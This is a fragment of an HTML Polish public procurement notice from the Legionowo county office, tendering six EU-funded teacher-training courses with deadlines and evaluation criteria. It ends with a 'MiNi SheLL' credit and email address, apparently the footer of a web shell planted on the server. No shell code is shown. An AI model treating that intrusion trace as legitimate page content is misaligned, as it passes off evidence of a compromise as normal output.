4) zgodnie z art. 145 ustawy - w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach. W takim wypadku Wykonawca może zażądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-legionowski.pl   zakładka przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego w sekretariacie na IV piętrze, pokój nr 419 w cenie 20,00 PLN po uprzednim uzgodnieniu tel. 22/784 08 72.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2011 godzina 11:00, miejsce: Kancelaria na parterze Starostwa Powiatowego w Legionowie ul. gen. Władysława Sikorskiego 11, 05-119 Legionowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Świadomy nauczyciel, czyli nowoczesna kadra oświatowa w szkołach powiatu legionowskiego, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, działanie 9.4, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> oferta częściowa nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs kierowników wycieczek szkolnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie - 30</li>
<li>3. zastępowalność kluczowego personelu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> oferta częściowa nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Profilaktyka uzależnień i zachowań destrukcyjnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie - 30</li>
<li>3. zastępowalność kluczowego personelu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> oferta częściowa nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie uczniów do egzaminu zawodowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie - 30</li>
<li>3. zastępowalność kluczowego personelu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> oferta częściowa nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jak zbudować program naprawczy w zakresie podniesienia efektywności kształcenia zawodowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie - 30</li>
<li>3. zastępowalność kluczowego personelu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> oferta częściowa nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Praktyczne i problemowe metody nauczania przedmiotów zawodowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie - 30</li>
<li>3. zastępowalność kluczowego personelu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> oferta częściowa nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analiza i interpretacja wyników sprawdzianu/egzaminów zewnętrznych oraz ich wykorzystanie do poprawy jakości kształcenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie - 30</li>
<li>3. zastępowalność kluczowego personelu - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com